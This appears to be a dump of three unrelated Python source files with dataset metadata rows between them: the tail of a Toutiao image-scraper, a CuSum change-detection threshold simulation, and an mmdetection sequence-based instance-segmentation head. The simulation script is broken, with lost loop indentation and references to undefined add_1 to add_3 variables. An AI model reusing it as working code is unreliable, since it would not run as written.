    Entries without a title or image list are skipped.
    """
    data = json.get('data')
    if not data:
        return
    for entry in data:
        title = entry.get('title')
        thumbnails = entry.get('image_list')
        if title is None or thumbnails is None:
            continue
        for thumb in thumbnails:
            origin_image = re.sub("list/300x196/", "origin/", thumb.get('url'))
            print(thumb.get('url'))
            print(origin_image)
            print("---")
            items.append({
                'image': origin_image,
                'title': title
            })
def save_image(item):
    """Download one image and save it under a per-title directory.

    The file name is the MD5 of the content, so a previously downloaded
    image is detected and skipped.

    Args:
        item: dict with keys 'image' (URL) and 'title' (directory name).
    """
    # One sub-directory per article title.
    img_path = '/Users/zzzz/Desktop/image' + os.path.sep + item.get('title')
    if not os.path.exists(img_path):
        os.makedirs(img_path)
    try:
        # Bug fix: `headers` was passed positionally, which made requests
        # treat it as the `params` query-string argument; pass it by keyword.
        resp = requests.get(item.get('image'), headers=headers)
        if codes.ok == resp.status_code:
            file_path = img_path + os.path.sep + '{file_name}.{file_suffix}'.format(
                file_name=md5(resp.content).hexdigest(),
                file_suffix='jpg')
            if not os.path.exists(file_path):
                with open(file_path, 'wb') as f:
                    f.write(resp.content)
                print('Downloaded image path is %s' % file_path)
            else:
                print('Already Downloaded', file_path)
    except requests.ConnectionError:
        print('Failed to Save Image,item %s' % item)
def main(offset):
    """Crawl result pages starting at *offset* and download every image.

    Bug fixes: the starting offset used to be ignored (the loop always began
    at 0), and the whole accumulated ``items`` list was re-iterated and
    re-saved after every page instead of once at the end.
    """
    for offset in range(offset, 100, 20):
        json = get_page(offset)
        get_images(json)
    # Save once, after all pages have been collected.
    for item in items:
        save_image(item)
main(0)
| ZhouYuanZZZZ/pythonStudy | spider/toutiao/toutiao_jiepai.py | toutiao_jiepai.py | py | 3,035 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "urllib.parse.urlencode",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "requests.ConnectionError",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "re.... |
34533830120 | import numpy as np
from scipy import stats
# from expon_cusum import Lv,F1
# import matplotlib.pyplot as plt
### This script is used to compare the thresholds for CuSum & WL-Cusum
## From first commit
class F1(object):
    """Post-change observation model: Gaussian noise around an exponentially
    growing mean ``mu_1 * exp(c * (t - nu))``.

    ``nu`` is the change point and ``t`` the current time; methods taking
    both assume ``t > nu``.
    """

    def __init__(self, c, mu_1=1, sig_1=1):
        self.c = c
        self.mu_1 = mu_1
        self.dist = stats.norm(0, sig_1)

    def _mean_at(self, nu, t):
        # Deterministic drift of the post-change mean at time t.
        return self.mu_1 * np.exp(self.c * (t - nu))

    def pdf(self, y, nu, t):
        # Scalar density of observation y at time t (t > nu required).
        assert not isinstance(y, np.ndarray)
        return self.dist.pdf(y - self._mean_at(nu, t))

    def logpdf(self, y, nu, t):
        # Scalar log-density of observation y at time t (t > nu required).
        assert not isinstance(y, np.ndarray)
        return self.dist.logpdf(y - self._mean_at(nu, t))

    def rvs(self, size, nu, t):
        # Sample observations for times t, t+1, ..., t+size-1 (t > nu).
        drift = self._mean_at(nu, np.arange(t, t + size))
        return self.dist.rvs(size=size) + drift

    def logpdf_arr(self, y):
        # Joint log-density of an array assumed to start right at the change.
        assert isinstance(y, np.ndarray)
        ind = np.arange(float(len(y)))
        return np.sum(self.dist.logpdf(y - self.mu_1 * np.exp(self.c * ind)))
def gfun(y, fc, f0):
    """Generalised-likelihood scan over candidate change points.

    For each start index k, computes the log-likelihood ratio of the suffix
    ``y[k:]`` under the post-change model ``fc`` versus the pre-change model
    ``f0``.  Returns the pair ``(argmax_k, max_llr)``.
    """
    n = len(y)
    llr = np.zeros(n)
    for start in range(n):
        suffix = y[start:]
        llr[start] = fc.logpdf_arr(suffix) - np.sum(f0.logpdf(suffix))
    return (np.argmax(llr), np.amax(llr))
def Lv(y, f0, c, t):
    """Windowed GLR statistic over the window ``y``.

    Builds an ``F1`` post-change model matched to the mean/variance of the
    pre-change distribution ``f0`` and returns the maximal log-likelihood
    ratio over all change points inside the window.
    """
    _, best_llr = gfun(y, F1(c, mu_1=f0.mean(), sig_1=np.sqrt(f0.var())), f0)
    return best_llr
c = 0.4
f0 = stats.norm(0.1,100)
# f1 = F1(c,mu_1=f0.mean(),sig_1=np.sqrt(f0.var()))
b_1 = np.exp(np.linspace(np.log(.75),np.log(1.05),5))
b_2 = np.exp(np.linspace(np.log(.22),np.log(.32),5))
b_3 = np.exp(np.linspace(np.log(2),np.log(4.8),5))
N = 10000
mtfa_1 = np.zeros(len(b_1))
mtfa_2 = np.zeros(len(b_2))
mtfa_3 = np.zeros(len(b_3))
# add_1 = np.zeros(len(b_1))
# add_2 = np.zeros(len(b_2))
# add_3 = np.zeros(len(b_3))
W_1 = 25
W_2 = 50
for j in range(N):
for i in range(len(b_1)):
t = W_1
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_1 = Lv(y[max(1,t-W_1+1):t+1], f0, c, t)
if (v_1 > b_1[i]):
mtfa_1[i] = mtfa_1[i] + t - W_1 + 1
break
t = t + 1
# print(mtfa_1[i])
for i in range(len(b_2)):
t = W_2
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_2 = Lv(y[max(1,t-W_2+1):t+1], f0, c, t)
if (v_2 > b_2[i]):
mtfa_2[i] = mtfa_2[i] + t - W_2 + 1
break
t = t + 1
# print(mtfa_2[i])
# No WL
for i in range(len(b_3)):
t = 0
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_3 = Lv(y[:t+1], f0, c, t)
if (v_3 > b_3[i]):
mtfa_3[i] = mtfa_3[i] + t + 1
break
t = t + 1
# for i in range(len(b_1)):
# t = W_1
# y = f0.rvs(size=W_1)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_1,nu=W_1-1,t=t))
# v_1 = Lv(y[max(1,t-W_1+1):t+1], f0, c, t)
# if (v_1 > b_1[i]):
# add_1[i] = add_1[i] + t - W_1 + 1
# break
# t = t + 1
#
# for i in range(len(b_2)):
# t = W_2
# y = f0.rvs(size=W_2)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_2,nu=W_2-1,t=t))
# v_2 = Lv(y[max(1,t-W_2+1):t+1], f0, c, t)
# if (v_2 > b_2[i]):
# add_2[i] = add_2[i] + t - W_2 + 1
# break
# t = t + 1
#
# for i in range(len(b_3)):
# t = W_3
# y = f0.rvs(size=W_3)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_3,nu=W_3-1,t=t))
# v_3 = Lv(y[max(1,t-W_3+1):t+1], f0, c, t)
# if (v_3 > b_3[i]):
# add_3[i] = add_3[i] + t - W_3 + 1
# break
# t = t + 1
if j % 10 == 9:
print("Num of Iterations:", (j+1))
print("mtfa_1:", mtfa_1 / (j+1))
print("mtfa_2:", mtfa_2 / (j+1))
print("mtfa_3:", mtfa_3 / (j+1))
print("add_1:", add_1 / (j+1))
print("add_2:", add_2 / (j+1))
print("add_3:", add_3 / (j+1))
# with open('./icp_cusum_t1.npy', 'wb') as f:
# np.save(f, mtfa_1 / (j+1))
# np.save(f, mtfa_2 / (j+1))
# np.save(f, mtfa_3 / (j+1))
# np.save(f, add_1 / (j+1))
# np.save(f, add_2 / (j+1))
# np.save(f, add_3 / (j+1))
###
| jacksonliang35/Quickest-Change-Detection | Non-Stationary/ns_wl_thr.py | ns_wl_thr.py | py | 4,956 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "scipy.stats.norm",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "scipy.stats",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "numpy.ndarray",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "numpy.exp",
"line... |
41120383892 | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.runner import force_fp32, BaseModule, auto_fp16
from mmcv.ops.roi_align import roi_align
from mmdet.core import (bbox_cxcywh_to_xyxy, bbox_xyxy_to_cxcywh,
build_assigner, build_sampler, multi_apply,
reduce_mean)
from mmdet.models.builder import HEADS
import torch.distributed as dist
import random
from timm.models.vision_transformer import trunc_normal_
from model import build_model
import numpy as np
import os
from math import sqrt
BYTES_PER_FLOAT = 4
# TODO: This memory limit may be too much or too little. It would be better to
# determine it based on available resources.
GPU_MEM_LIMIT = 1024**3 # 1 GB memory limit
@HEADS.register_module()
class InsSegHead(BaseModule):
_version = 2
    def __init__(self,
                 task_id,
                 num_classes,
                 loss_weight=1.0,
                 num_query=100,
                 num_bins=2000,
                 coord_norm='abs',
                 norm_val=1333,
                 transformer=None,
                 sync_cls_avg_factor=False,
                 with_mask=True,
                 init_cfg=None,
                 vae_cfg=dict(
                     token_length=16,
                     mask_size=64,
                     embedding_dim=64,
                     num_embeddings=256,
                     pretrained='vqvae_patch16_256_64.pth',
                     freeze=True
                 ),
                 seq_aug=None,
                 box_std=0.2,
                 cls_drop=0.,
                 mask_before_label=False,
                 sup_neg_mask=False,
                 no_sup_mask=False,
                 cls_weight=1.0,
                 box_weight=1.0,
                 mask_weight=1.0,
                 class_label_corruption='rand_n_fake_cls',
                 decoder_loss_weight=0.,
                 dice_loss_weight=1.0,
                 max_obj_decoderloss=100,
                 **kwargs):
        """Sequence-to-sequence instance segmentation head.

        Objects are encoded as token sequences of length
        ``4 (box) + 1 (class) + token_length (VQ-VAE mask tokens)``.
        The shared vocabulary is laid out as: coordinate bins
        [0, num_bins], class labels, one "noise" label, then the
        VQ-VAE codebook indices (see the *_offset attributes below).
        NOTE(review): ``vae_cfg`` is indexed both like a dict
        (``vae_cfg['token_length']``) and like an object
        (``self.vae_cfg.num_embeddings``) — presumably an mmcv
        Config-style mapping; confirm with callers.
        """
        super().__init__(init_cfg)
        self.cnt = 0
        self.decoder_loss_weight = decoder_loss_weight
        self.max_obj_decoderloss = max_obj_decoderloss
        self.dice_loss_weight = dice_loss_weight
        self.task_id = task_id
        self.loss_weight = loss_weight
        self.class_label_corruption = class_label_corruption
        self.cls_weight = cls_weight
        self.box_weight = box_weight
        self.mask_weight = mask_weight
        self.mask_before_label = mask_before_label
        self.sup_neg_mask = sup_neg_mask
        self.no_sup_mask = no_sup_mask
        self.bg_cls_weight = 0
        self.sync_cls_avg_factor = sync_cls_avg_factor
        self.num_query = num_query
        self.num_bins = num_bins
        self.coord_norm = coord_norm
        self.norm_val = norm_val
        self.num_classes = num_classes
        self.fp16_enabled = False
        self.with_mask = with_mask
        self.box_std = box_std
        self.cls_drop = cls_drop
        self.transformer = transformer
        self.mask_token_length = vae_cfg['token_length']
        self.transformer.mask_token_length = self.mask_token_length
        self.vqvae = build_model(vae_cfg)
        self.mask_size = (vae_cfg['mask_size'], vae_cfg['mask_size'])
        self.vae_cfg = vae_cfg
        self.seq_aug = seq_aug
        self.num_vocal = self.transformer.num_vocal
        # Vocabulary layout offsets: [0, num_bins] coordinate bins, then
        # class labels, then the noise label, then VQ-VAE mask codes.
        self.class_offset = num_bins + 1
        self.special_offset = self.class_offset + num_classes
        self.noise_label = self.special_offset + 1
        self.mask_offset = self.special_offset + 2
        # Per-token CE weights so box/class/mask tokens can be re-balanced.
        class_weight = torch.ones(self.num_vocal)
        class_weight[:self.num_bins+1] = box_weight
        class_weight[self.class_offset: self.class_offset +
                     num_classes] = cls_weight
        class_weight[self.noise_label] = cls_weight
        class_weight[self.mask_offset: self.mask_offset +
                     self.vae_cfg.num_embeddings] = mask_weight
        self.loss_seq = nn.CrossEntropyLoss(
            weight=class_weight, reduction='sum')
    def build_input_seq(self, targets, max_objects=100):
        """Build per-image input token sequences from ground-truth objects.

        Each target is a tuple ``(box, mask_token, gt_masks, mask_idx,
        label, img_size)``.  Real objects are tokenised as
        [4 box bins, class, mask tokens] (order depends on
        ``mask_before_label``).  When ``seq_aug`` is enabled, the sequence
        is padded up to ``max_objects`` with synthetic "noise" objects
        (random/shifted boxes and jittered duplicates of real boxes),
        following the Pix2Seq-style sequence augmentation.

        Returns:
            (stacked sequences of shape [B, max_objects * (5 + token_length)],
             per-image indices of the purely random "bad" noise boxes).
            Without ``seq_aug`` the flag list is empty and sequences are
            zero-padded to the longest image instead.
        """
        device = targets[0][0].device

        def shift_bbox(bbox, scale_factor):
            # Keep each box's size but move its centre uniformly at random.
            n = bbox.shape[0]
            box_xy = torch.rand((n, 2), device=device) * scale_factor[:2]
            box_wh = (bbox[:, 2:] - bbox[:, :2]) / 2.
            box = torch.cat([box_xy - box_wh, box_xy + box_wh], dim=-1)
            return box

        def random_bbox(n, scale_factor):
            # Fully random boxes with truncated-normal half-sizes.
            box_xy = torch.rand((n, 2), device=device)
            # trunc normal generate [-2,2]
            box_wh = torch.abs(trunc_normal_(
                torch.empty((n, 2), device=device)) / 4)
            box = torch.cat([box_xy - box_wh, box_xy + box_wh],
                            dim=-1) * scale_factor
            return box

        def jitter_bbox(bbox, max_range=0.1):
            # Perturb box corners proportionally to the box size.
            n = bbox.shape[0]
            if n == 0:
                return bbox
            w = bbox[:, 2] - bbox[:, 0]
            h = bbox[:, 3] - bbox[:, 1]
            noise = torch.stack([w, h, w, h], dim=-1)
            noise_rate = trunc_normal_(torch.empty(
                (n, 4), device=device)) / 2 * max_range
            bbox = bbox + noise * noise_rate
            return bbox

        assert self.coord_norm == 'abs'
        input_seq_list = []
        bad_bbox_flag_list = []
        max_len = max([t[0].size(0) for t in targets])
        for b_i, target in enumerate(targets):
            box, mask_token, gt_masks, mask_idx, label, img_size = target
            mask_token_sft = mask_token + self.mask_offset
            h, w = img_size[0], img_size[1]
            scale_factor = torch.tensor([w, h, w, h], device=device)
            label_token = label.unsqueeze(1) + self.class_offset
            if self.coord_norm == 'abs':
                norm_box = box / self.norm_val
            else:
                norm_box = box / scale_factor
            # Quantise normalised coordinates into [0, num_bins] bins.
            box_tokens = (
                norm_box * self.num_bins).round().long().clamp(min=0, max=self.num_bins)
            if self.mask_before_label:
                input_tokens = torch.cat(
                    [box_tokens, mask_token_sft, label_token], dim=1)
            else:
                input_tokens = torch.cat(
                    [box_tokens, label_token, mask_token_sft], dim=1)
            if self.seq_aug is None:
                # No augmentation: zero-pad to the longest image and move on.
                input_tokens = input_tokens.flatten()
                nan = torch.full((max_len * (5 + self.vae_cfg.token_length) -
                                  len(input_tokens),), 0, dtype=torch.int64, device=device)
                input_seq = torch.cat([input_tokens, nan], dim=0)
                input_seq_list.append(input_seq)
                continue
            num_objects = input_tokens.shape[0]
            num_noise = max_objects - num_objects
            # Create bad bbox.
            dup_bbox_size = random.randint(0, num_noise)
            dup_bbox_size = 0 if num_objects == 0 else dup_bbox_size
            bad_bbox_size = num_noise - dup_bbox_size
            random_class = self.noise_label  # noise label
            multiplier = 1 if num_objects == 0 else num_noise // num_objects + 1
            box_tiled = box.repeat((multiplier, 1))
            box_tiled_idx = torch.arange(
                len(box), device=device).repeat(multiplier)
            bad_bbox_shift = box_tiled[torch.randperm(len(box_tiled))[
                :bad_bbox_size]]
            bad_bbox_shift = shift_bbox(bad_bbox_shift, scale_factor)
            bad_bbox_random = torch.cat(
                (random_bbox(bad_bbox_size, scale_factor), bad_bbox_shift), dim=0)
            bad_bbox = bad_bbox_random[torch.randperm(
                len(bad_bbox_random))[:bad_bbox_size]]
            bad_bbox_label = torch.full(
                (bad_bbox_size, ), random_class, device=device)
            # Bad boxes get the mask tokens of an all-zero (empty) mask.
            bad_mask = self.vqvae.encode(torch.zeros(
                (1,)+self.mask_size, device=device))
            bad_mask_token = bad_mask.expand(bad_bbox_size, -1)
            # Create dup bbox.
            permidx = torch.randperm(len(box_tiled), device=device)[
                :dup_bbox_size]
            dup_bbox = box_tiled[permidx]
            dup_bbox = jitter_bbox(dup_bbox, max_range=0.1)
            dup_bbox = dup_bbox.max(box.new([0., 0., 0., 0.])).min(
                scale_factor)  # add for pre crop/roi
            dup_bbox_label = torch.full(
                (dup_bbox_size, ), random_class, device=device)
            # Duplicates keep the real object's mask, re-cropped to the
            # jittered box.
            dup_mask = crop_and_resize_gpu(
                gt_masks, dup_bbox, self.mask_size, mask_idx[box_tiled_idx[permidx]], device=device)
            dup_mask_token = self.vqvae.encode(dup_mask)
            # Shuffle bad and duplicate noise objects together; remember
            # which positions hold the purely random ("bad") ones.
            shuffle_idx = torch.randperm(num_noise)
            bad_bbox_flag = torch.cat((torch.ones(bad_bbox_size, device=device), torch.zeros(
                dup_bbox_size, device=device))).to(torch.bool)
            bad_bbox_flag_list.append(
                bad_bbox_flag[shuffle_idx].nonzero(as_tuple=True)[0])
            noise_box = torch.cat((bad_bbox, dup_bbox), dim=0)[shuffle_idx].max(
                box.new([0., 0., 0., 0.])).min(scale_factor)
            noise_box_label = torch.cat(
                (bad_bbox_label, dup_bbox_label), dim=0)[shuffle_idx]
            noise_mask_token = torch.cat(
                (bad_mask_token, dup_mask_token), dim=0)[shuffle_idx]
            if self.coord_norm == 'abs':
                random_norm_box = noise_box / self.norm_val
            else:
                random_norm_box = noise_box / scale_factor
            noise_box_tokens = (
                random_norm_box * self.num_bins).round().long().clamp(min=0, max=self.num_bins)
            if self.mask_before_label:
                fake_tokens = torch.cat(
                    [noise_box_tokens, noise_mask_token + self.mask_offset, noise_box_label.unsqueeze(1)], dim=1)
            else:
                fake_tokens = torch.cat([noise_box_tokens, noise_box_label.unsqueeze(
                    1), noise_mask_token + self.mask_offset], dim=1)
            input_seq = torch.cat([input_tokens, fake_tokens], dim=0).flatten()
            input_seq_list.append(input_seq)
        return torch.stack(input_seq_list, dim=0), bad_bbox_flag_list
    def get_targets(self, input_seq, num_objects_list, bad_bbox_flag_list):
        """Turn the (un-corrupted) input sequence into the training target.

        Marks positions that should not be supervised with -100, which is
        ``nn.CrossEntropyLoss``'s default ``ignore_index``:
        - box tokens of all noise objects are always ignored;
        - mask-token supervision depends on the flags: ``no_sup_mask``
          ignores every mask token, ``sup_neg_mask`` supervises masks of
          duplicated noise objects but ignores the purely random ("bad")
          ones, otherwise all noise masks are ignored.
        Class tokens are always supervised. Modifies ``input_seq`` in place.
        """
        N, L = input_seq.shape[0], input_seq.shape[1]//(
            5 + self.vae_cfg.token_length)
        for seq, num_objects, bad_bbox_flag in zip(input_seq, num_objects_list, bad_bbox_flag_list):
            # Ignore box tokens of everything past the real objects.
            seq.view(L, 5 + self.vae_cfg.token_length)[num_objects:, :4] = -100
            if self.no_sup_mask:
                if self.mask_before_label:
                    seq.view(
                        L, 5 + self.vae_cfg.token_length)[:, 4:4+self.vae_cfg.token_length] = -100
                else:
                    seq.view(L, 5 + self.vae_cfg.token_length)[:, 5:] = -100
            elif self.sup_neg_mask:
                if self.mask_before_label:
                    seq.view(L, 5 + self.vae_cfg.token_length)[
                        num_objects+bad_bbox_flag, 4:4+self.vae_cfg.token_length] = -100
                else:
                    seq.view(
                        L, 5 + self.vae_cfg.token_length)[num_objects+bad_bbox_flag, 5:] = -100
            else:
                if self.mask_before_label:
                    seq.view(
                        L, 5 + self.vae_cfg.token_length)[num_objects:, 4:4+self.vae_cfg.token_length] = -100
                else:
                    seq.view(
                        L, 5 + self.vae_cfg.token_length)[num_objects:, 5:] = -100
        return input_seq
    def forward(self, feats, img_metas, input_seq=None):
        """Run ``forward_single`` on every feature level.

        The same image metas and input sequence are broadcast to each level;
        returns the per-level outputs combined by ``multi_apply``.
        """
        num_levels = len(feats)
        img_metas_list = [img_metas for _ in range(num_levels)]
        input_seq_list = [input_seq for _ in range(num_levels)]
        return multi_apply(self.forward_single, feats, img_metas_list, input_seq_list)
    def forward_single(self, x, img_metas, input_seq):
        """Run the transformer on one feature level.

        Builds a per-image padding mask (1 = padded region outside the
        actual image, 0 = valid pixels) when ``with_mask`` is set, resizes
        it to the feature resolution, and decodes
        ``num_query * (5 + mask_token_length)`` tokens.
        """
        batch_size = x.size(0)
        input_img_h, input_img_w = img_metas[0]['batch_input_shape']
        if self.with_mask:
            masks = x.new_ones((batch_size, input_img_h, input_img_w))
            for img_id in range(batch_size):
                img_h, img_w, _ = img_metas[img_id]['img_shape']
                # zero out the valid image area; padding stays masked
                masks[img_id, :img_h, :img_w] = 0
        else:
            masks = x.new_zeros((batch_size, input_img_h, input_img_w))
        # interpolate masks to have the same spatial shape with x
        masks = F.interpolate(
            masks.unsqueeze(1), size=x.shape[-2:]).to(torch.bool).squeeze(1)
        # outs_dec: [bs, num_query, embed_dim]
        outs_dec = self.transformer(
            x, input_seq, masks, self.task_id, pred_len=self.num_query*(5+self.mask_token_length))
        return (outs_dec,)
@force_fp32(apply_to=('out_seq'))
def loss2(self,
out_seq,
target_seq
):
# NOTE defaultly only the outputs from the last feature scale is used.
# only for log purpose
B, L, C = out_seq.shape
out_seq_objs = out_seq.view(B, -1, 5+self.mask_token_length, C)
target_seq_objs = target_seq.view(B, -1, 5+self.mask_token_length)
out_seq_box = out_seq_objs[:, :, :4, :].reshape(-1, self.num_vocal)
target_seq_box = target_seq_objs[:, :, :4].flatten()
num_pos_box = (target_seq_box > -1).sum()
bbox_ce = self.loss_seq(
out_seq_box, target_seq_box) / num_pos_box.clamp(min=1)
if self.mask_before_label:
out_seq_cls = out_seq_objs[:, :, -1, :].reshape(-1, self.num_vocal)
target_seq_cls = target_seq_objs[:, :, -1].flatten()
num_pos_cls = (target_seq_cls > -1).sum()
cls_ce = self.loss_seq(
out_seq_cls, target_seq_cls) / num_pos_cls.clamp(min=1)
out_seq_mask = out_seq_objs[:, :, 4:4 +
self.vae_cfg.token_length, :].reshape(-1, self.num_vocal)
target_seq_mask = target_seq_objs[:, :,
4:4+self.vae_cfg.token_length].flatten()
num_pos_mask = (target_seq_mask > -1).sum()
mask_ce = self.loss_seq(
out_seq_mask, target_seq_mask) / num_pos_mask.clamp(min=1)
else:
out_seq_cls = out_seq_objs[:, :, 4, :].reshape(-1, self.num_vocal)
target_seq_cls = target_seq_objs[:, :, 4].flatten()
num_pos_cls = (target_seq_cls > -1).sum()
cls_ce = self.loss_seq(
out_seq_cls, target_seq_cls) / num_pos_cls.clamp(min=1)
out_seq_mask = out_seq_objs[:, :, 5:,
:].reshape(-1, self.num_vocal)
target_seq_mask = target_seq_objs[:, :, 5:].flatten()
num_pos_mask = (target_seq_mask > -1).sum()
mask_ce = self.loss_seq(
out_seq_mask, target_seq_mask) / num_pos_mask.clamp(min=1)
num_obj = num_pos_mask // self.vae_cfg.token_length
num_obj = num_obj.clamp(max=self.max_obj_decoderloss)
if self.decoder_loss_weight > 0. and num_obj > 0.:
assert B == 1
vae_reso = int(sqrt(self.vae_cfg.token_length))
vae_mask = out_seq_mask[:, self.mask_offset: self.mask_offset+self.vae_cfg.num_embeddings].view(
-1, vae_reso, vae_reso, self.vae_cfg.num_embeddings).permute(0, 3, 1, 2)
soft_mask = self.vqvae.decode_soft(vae_mask[:num_obj])
decoder_aux_ce = self.dice_loss_weight * \
dice_loss(
soft_mask, self.mask[:num_obj]) + F.mse_loss(soft_mask, self.mask[:num_obj])
else:
decoder_aux_ce = torch.tensor(
0., device=f'cuda:{torch.cuda.current_device()}')
out_seq = out_seq.reshape(-1, self.num_vocal)
target_seq = target_seq.flatten()
loss_seq = self.loss_seq(out_seq, target_seq)
loss_dict = {'loss': (loss_seq + decoder_aux_ce * self.decoder_loss_weight *
num_pos_mask * self.mask_weight) * self.loss_weight}
loss_dict.update({'cls_ce': cls_ce, 'bbox_ce': bbox_ce,
'mask_ce': mask_ce, 'decoder_aux_ce': decoder_aux_ce})
return loss_dict
    def corrupt_label(self, input_seq):
        """Overwrite the class-token slot of every object with a corrupted label.

        Training-time augmentation: depending on
        ``self.class_label_corruption``, each object's class token is replaced
        by a random class token, a fixed "noise" token, or a 50/50 mix of the
        two.  The replacement is written through a view, so ``input_seq`` is
        modified in place and also returned.

        Args:
            input_seq: Token sequence of shape
                (N, L * (5 + mask_token_length)) — per object: 4 bbox tokens,
                1 class token and the mask tokens.

        Returns:
            The (possibly corrupted) ``input_seq``.
        """
        if self.class_label_corruption == 'none':
            return input_seq
        # N sequences, L objects per sequence (each object spans
        # 5 + mask_token_length tokens).
        N, L = input_seq.shape[0], input_seq.shape[1]//(
            5+self.mask_token_length)
        device = input_seq.device
        # Uniform random class ids, shifted into the class-token vocabulary range.
        randlabel = torch.randint(
            self.num_classes, (N, L), device=device) + self.class_offset
        noiselabel = torch.full((N, L), self.noise_label,
                                device=device)  # noise label
        if self.class_label_corruption == 'rand_n_fake_cls':
            # Per-slot coin flip between a random class and the noise label.
            corruptlabel = torch.where(torch.rand(
                (N, L), device=device) < 0.5, randlabel, noiselabel)
        elif self.class_label_corruption == 'rand_cls':
            corruptlabel = randlabel
        else:
            raise NotImplementedError
        # The class slot is the last token of each object when mask tokens
        # precede the label, otherwise it sits right after the 4 bbox tokens.
        if self.mask_before_label:
            input_seq.view(
                N, L, 5+self.mask_token_length)[:, :, -1] = corruptlabel
        else:
            input_seq.view(
                N, L, 5+self.mask_token_length)[:, :, 4] = corruptlabel
        return input_seq
    def get_seq(self,
                img_metas,
                gt_bboxes,
                gt_labels=None,
                gt_masks=None,
                gt_bboxes_ignore=None,
                proposal_cfg=None,
                ):
        """Build the (label-corrupted) input sequence and target sequence.

        Per image: objects are randomly permuted, masks are cropped/resized
        to their boxes and encoded into VQ-VAE tokens, then everything is
        packed into a flat token sequence of at most ``self.num_query``
        objects.

        Args:
            img_metas: Per-image meta dicts; only 'img_shape' is read here.
            gt_bboxes: List of per-image GT bbox tensors (permuted in place).
            gt_labels: List of per-image GT label tensors (permuted in place).
            gt_masks: List of per-image GT instance masks.
            gt_bboxes_ignore: Unused here; kept for detection-head API parity.
            proposal_cfg: Must be None (this head uses no proposals).

        Returns:
            Tuple ``(input_seq_corruptlabel, target_seq)``: the corrupted
            input sequence with its last token dropped, and the training
            targets (-100 marks positions to ignore in the loss).
        """
        assert proposal_cfg is None, '"proposal_cfg" must be None'
        # random permute box
        device = gt_labels[0].device
        gt_masktoken_list = []
        rand_idx_list = []
        for idx in range(len(gt_labels)):
            rand_idx = torch.randperm(len(gt_labels[idx]), device=device)
            gt_labels[idx] = gt_labels[idx][rand_idx]
            gt_bboxes[idx] = gt_bboxes[idx][rand_idx]
            # crop mask
            mask = crop_and_resize_gpu(
                gt_masks[idx], gt_bboxes[idx], self.mask_size, rand_idx, device=device)
            # Cached for the decoder auxiliary loss.  NOTE(review): this keeps
            # only the last image's masks — looks like it assumes batch size 1;
            # confirm against the loss code.
            self.mask = mask
            mask_token = self.vqvae.encode(mask)
            gt_masktoken_list.append(mask_token)
            rand_idx_list.append(rand_idx)
        input_seq, bad_bbox_flag_list = self.build_input_seq(list(zip(gt_bboxes, gt_masktoken_list, gt_masks, rand_idx_list, gt_labels, [
            img_meta['img_shape'][:2] for img_meta in img_metas])), max_objects=self.num_query)
        # Corrupt the class tokens on a copy, then drop the last token so the
        # model predicts each token from the preceding ones.
        input_seq_corruptlabel = self.corrupt_label(input_seq.clone())[:, :-1]
        target_seq = self.get_targets(input_seq, [len(
            gt_label) for gt_label in gt_labels], bad_bbox_flag_list)  # set -100 ignore
        return input_seq_corruptlabel, target_seq
@force_fp32(apply_to=('all_cls_scores_list', 'all_bbox_preds_list'))
def get_bboxes(self,
all_cls_scores_list,
img_metas,
rescale=False):
# NOTE defaultly only using outputs from the last feature level,
# and only the outputs from the last decoder layer is used.
cls_scores = all_cls_scores_list[-1]
result_list = []
for img_id in range(len(img_metas)):
cls_score = cls_scores[img_id]
img_shape = img_metas[img_id]['img_shape']
ori_shape = img_metas[img_id]['ori_shape']
scale_factor = img_metas[img_id]['scale_factor']
proposals = self._get_bboxes_single(cls_score,
img_shape, ori_shape, scale_factor,
rescale)
result_list.append(proposals)
return result_list
    def _get_bboxes_single(self,
                           cls_score,
                           img_shape,
                           ori_shape,
                           scale_factor,
                           rescale=False):
        """Decode one image's predicted token sequence.

        Args:
            cls_score: Either ``(pred_token, pred_score)`` (hard inference) or
                ``(pred_token, pred_score, pred_mask_logits)`` (soft inference).
            img_shape: Network-input image shape (h, w, ...).
            ori_shape: Original image shape the masks are pasted onto.
            scale_factor: Per-axis resize factor used during preprocessing.
            rescale: If True, map boxes back to the original image scale.

        Returns:
            Tuple of (boxes with scores of shape (n, 5), class tokens of
            shape (n,), boolean seg masks of shape (n, H, W)).
        """
        if len(cls_score) == 2:
            pred_token, pred_score = cls_score
            pred_mask_logits = None
        else:
            pred_token, pred_score, pred_mask_logits = cls_score
        # pred_token = pred_token.long()
        seq_len = pred_token.shape[0]
        # Tokens per object: 4 bbox + 1 class + mask tokens.
        obj_len = 5 + self.mask_token_length
        if seq_len < obj_len:
            # Not even one complete object was generated: return empty results.
            device, dtype = pred_score.device, pred_score.dtype
            return torch.tensor([], device=device, dtype=dtype), torch.tensor([], device=device, dtype=torch.long), torch.empty((0, ori_shape[0], ori_shape[1]), device=device, dtype=torch.bool)
        num_objects = seq_len // obj_len
        # Keep only whole objects and split the flat sequence per object.
        pred_token = pred_token[:int(
            num_objects * obj_len)].reshape(num_objects, obj_len)
        # Slot layout depends on whether mask tokens precede the class token.
        if self.mask_before_label:
            pred_bbox_token = pred_token[:, :4]
            pred_class_token = pred_token[:, -1].long()
            pred_mask_token = pred_token[:, 4:4 +
                                         self.vae_cfg.token_length].long()
        else:
            pred_bbox_token = pred_token[:, :4]
            pred_class_token = pred_token[:, 4].long()
            pred_mask_token = pred_token[:, 5:].long()
        # De-quantize bbox tokens back to coordinates.
        if self.coord_norm == 'abs':
            boxes_per_image = pred_bbox_token * self.norm_val / self.num_bins
        else:
            boxes_per_image = pred_bbox_token / self.num_bins
